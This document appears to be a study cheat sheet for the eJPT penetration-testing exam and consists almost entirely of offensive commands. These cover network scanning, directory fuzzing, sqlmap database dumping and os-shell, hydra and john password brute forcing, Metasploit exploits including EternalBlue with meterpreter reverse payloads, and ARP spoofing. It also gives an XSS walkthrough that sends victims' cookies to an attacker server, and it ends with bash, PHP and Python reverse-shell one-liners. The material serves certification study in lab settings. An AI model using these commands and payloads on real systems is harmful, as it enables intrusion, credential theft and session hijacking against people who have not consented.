Table of Contents

This post contains commands to prepare for eLearnSecurity eJPT exam.


hosts discovery nmap:

nmap -sn > hosts.txt
nmap -sn -T4 -oG - | awk '/Up$/{print $2}'

open ports scan (save to file):

nmap -Pn -sV -T4 -A -oN ports.txt -p- -iL hosts.txt --open

UDP port scan:

nmap -sU -sV

nmap vuln scan example:

nmap --script vuln --script-args=unsafe=1 -iL hosts.txt

nmap SYN flood example:

watch -n 10 "nmap -e wlan0 -Pn -T5 -S"

spotting a firewall

If an nmap TCP scan identified a well-known service, such as a web server, but cannot detect the version, then there may be a firewall in place.

For example:

80/tcp  open   http?    syn-ack ttl 64

Another example:

80/tcp  open   tcpwrapped 

“tcpwrapped” means the TCP handshake was completed, but the remote host closed the connection without receiving any data.

These are both indicators that a firewall is blocking our scan with the target!


  • Use “–reason” to see why a port is marked open or closed
  • If a “RST” packet is received, then something prevented the connection - probably a firewall!


masscan open only examples:

sudo masscan -p 21,22,80,8080,445,9200 --rate 64000 --wait 0 --open-only -oG masscan.gnmap
sudo masscan -iL hosts.list -p0-65535 --rate 64000 --open-only


httprint banner grabling:

httprint -P0 -s /usr/share/httprint/signatures.txt -h


add a route linux:

ip route add via

routing table:

netstat -rn
Kernel IP routing table
Destination      Gateway        Genmask         Flags   MSS Window  irtt Iface
...   UG        0 0          0 tap0


discovery subdomain of a target by sublist3r:

sublist3r -d


filter by ip

ip.add ==

filter by dest ip

ip.dest ==

filter by source ip

ip.src ==

filter by tcp port

tcp.port == 25

filter by ip addr and port

ip.addr == and tcp.port == 8080

filter SYN flag

tcp.flags.syn == 1 and tcp.flags.ack ==0

broadcast filter

eth.dst == ff:ff:ff:ff:ff:ff

web app enumeration (gobuster)

fuzz directories

gobuster dir -u -w /usr/share/wordlists/rockyou.txt

fuzz files

gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html -o output.txt

webapp enum (ffuf)

directory discovery:

ffuf -w wordlist.txt -u

file discovery:

ffuf -w wordlist.txt -u -e .aspx,.php,.txt,.html

output of responses with status code:

ffuf -w /usr/share/wordlists/dirb/small.txt -u -mc 200,301

the -maxtime flag offers to end the ongoing fuzzing after the specified time in seconds:

ffuf -w wordlist.txt -u -maxtime 60

number of threads:

ffuf -w wordlist.txt -u -t 64


determine the databases:

sqlmap -u --dbs

determine the tables:

sqlmap -u -D dbname --tables

if tables not available, guess tables using common names

sqlmap -u -D dbname --common-tables

dump a table’s data:

sqlmap -u -D dbname -T table --dump

try to get os-shell:

sqlmap -u --os-shell


check example:

<script>alert("hack :)")</script>

there are four components as follows:

  • attacker client pc
  • attacker logging server
  • vulnerable server
  • victim client pc
  1. attacker: first finds a vulnerable server and its breach point.

  2. attacker: enter the following snippet in order to hijack the cookie kepts by victim client pc (p.s.: the ip address,, belongs to attacker logging server in this example):

<script>var i = new Image();i.src=""+document.cookie;</script>
  1. attacker: log into attacker logging server (P.S.: it is in this example), and execute the following command:
nc -vv -k -l -p 80
  1. attacker: when victim client pc browses the vulnerable server, check the output of the command above.

  2. attacker: after obtaining the victim’s cookie, utilize a firefox’s add-on called Cookie Quick Manager to change to the victim’s cookie in an effort to hijack the victim’s privilege.

bruteforce (hydra, john, hashcat)

wordlist generation

cewl -m 3 -w wordlist.txt

hydra http basic auth brute

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt http-head /admin/

hydra brute http digest

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt http-get /admin/

hydra brute http post form

hydra -l admin -P /usr/share/wordlists/rockyou.txt https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed"

hydra brute http authenticated post form

hydra -l admin -P /usr/share/wordlists/rockyou.txt https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed:H=Cookie\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v"

hydra brute

hydra -f -v -V -L users.txt -P rockyou-15.txt -s 2223 -f ssh://
hydra -v -V -l admin -P rockyou-10.txt ssh://

combine passwd with shadow file for john the ripper:

unshadow passwd shadow > crack.hash

john the ripper bruteforce:

john -wordlist /usr/share/wordlists/rockyou.txt crack.hash
john -wordlist /usr/share/wordlists/rockyou.txt -users users.txt test.hash


hashcat -m 1000 -a 0 -o found.txt --remove crack.hash rockyou-10.txt


wpscan --url --enumerate u
wpscan --url -e vp --plugins-detection mixed --api-token API_TOKEN
wpscan --url -e u --passwords /usr/share/wordlists/rockyou.txt
wpscan --url -U admin -P /usr/share/wordlists/rockyou.txt



nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122


mysql -h -P 13306 -u root -p -e "show databases;"
mysql -h -P 13306 -u root -p -e "use mydb;show tables;"
mysql -h -P 13306 -u root -p -e "use mydb;select * from users;"


search exploit

msf> search cve:2011 port:135 platform:windows target:XP


use auxiliary/scanner/mssql/mssql_login
set rhosts
set rports 1433
set username admin
set password 12345
set verbose true

mssql payload

use exploit/windows/mssql/mssql_payload
set rhosts
set rport 1433
set srvport 53
set username admin
set password qwerty
set payload windows/x64/meterpreter_reverse_tcp

ssh login enumeration (bruteforce)

use auxiliary/scanner/ssh/ssh_login
show options
set rhosts
set user_file /usr/share/ncrack/minimal.usr
set pass_file /usr/share/ncrack/minimal.usr
set verbose true

eternal blue x86 architecture example:

use exploit/windows/smb/ms17_010_psexec
show options

eternal blue x64 architecture example:

use exploit/windows/smb/ms17_010_eternalblue
show options
set payload windows/x64/meterpreter/reverse_tcp


meterpreter>run autoroute -s

sessions -l
sessions -i 1

sysinfo, ifconfig, route, getuid
getsystem (privesc)

download x /root/
upload x C:\\Windows

use post/windows/gather/hashdump

windows shares

enumeration with smbclient

nmblookup -A
smbclient -L // -N share
smbclient // -N mount

enum4linux -a

enumeration with nmap:

ll /usr/share/nmap/scripts/ | grep smb-enum-
-rw-r--r-- 1 root root  4846 Jan  9  2019 smb-enum-domains.nse
-rw-r--r-- 1 root root  5931 Jan  9  2019 smb-enum-groups.nse
-rw-r--r-- 1 root root  8045 Jan  9  2019 smb-enum-processes.nse
-rw-r--r-- 1 root root 27262 Jan  9  2019 smb-enum-services.nse
-rw-r--r-- 1 root root 12057 Jan  9  2019 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6923 Jan  9  2019 smb-enum-shares.nse
-rw-r--r-- 1 root root 12531 Jan  9  2019 smb-enum-users.nse

nmap --script=smb-enum-users

null sessions

  1. Use “enum4linux -n” to make sure if “<20>” exists:
enum4linux -n
  1. If “<20>” exists, it means Null Session could be exploited. Utilize the following command to get more details:
  1. If confirmed that Null Session exists, you can remotely list all share of the target:
smbclient -L WORKGROUP -I -N -U ""
  1. You also can connect the remote server by applying the following command:
smbclient \\\\\\c$ -N -U ""
  1. Download those files stored on the share drive:
smb: \> get Congratulations.txt

ARP spoofing

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i tap0 -t -r

reverse shell


bash -i >& /dev/tcp/ 0>&1

php one line (bash)

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'"); ?>


import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")